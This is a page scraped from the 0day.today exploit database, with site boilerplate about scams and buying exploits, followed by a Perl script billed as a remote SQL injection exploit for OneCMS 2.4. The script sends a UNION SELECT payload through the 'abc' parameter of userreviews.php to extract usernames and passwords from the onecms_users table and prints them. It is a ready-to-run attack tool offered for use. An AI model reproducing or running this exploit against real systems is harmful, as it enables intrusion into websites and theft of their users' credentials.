0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OneCMS 2.4 (userreviews.php abc) Remote SQL Injection Exploit
============================================================= OneCMS 2.4 (userreviews.php abc) Remote SQL Injection Exploit ============================================================= #!/usr/bin/perl # # OneCMS v2.4 Remote SQL Injection Exploit # # Description # ----------- # OneCMS contains a flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the userreviews.php script not # properly sanitizing user-supplied input to the 'abc' variable. This may # allow an attacker to inject or manipulate SQL queries in the backend # database if magic_quotes_gpc = off. # ----------- # $Id: inj3ct0r_onecms.pl,v 0.1 2007/09/19 15:02:12 inj3ct0r Exp $ use strict; use LWP::UserAgent; my $target = shift || &usage(); my $proxy = shift; &exploit($target); sub usage { print "[?] OneCMS v2.4 Remote SQL Injection Exploit\n"; print "[?] inj3ct0r <inj3ct0r[!]inj3ct0r.com>\n"; print "[?] usage: perl $0 [target]\n"; print " [target] (ex. http://127.0.0.1/OneCMS)\n"; print " [proxy] (ex. 0.0.0.0:8080)\n"; exit; } sub exploit { my($target) = @_; my $conn = LWP::UserAgent->new() or die; $conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)"); $conn->proxy("http", "http://".$proxy."/") unless !$proxy; my $out=$conn->get($target."/userreviews.php?abc=-1'%20union%20select%200,concat(0x3a,0x3a,0x3a,username,0x3a,password,0x3a,0x3a,0x3a)username,0,password,0,0,0,0,0%20from%20onecms_users/*"); if ($out->content =~ m/:::(.*?):::/ms) { print $1 . "\n"; } else { print "Exploit Failed\n"; } } # 0day.today [2024-11-15] #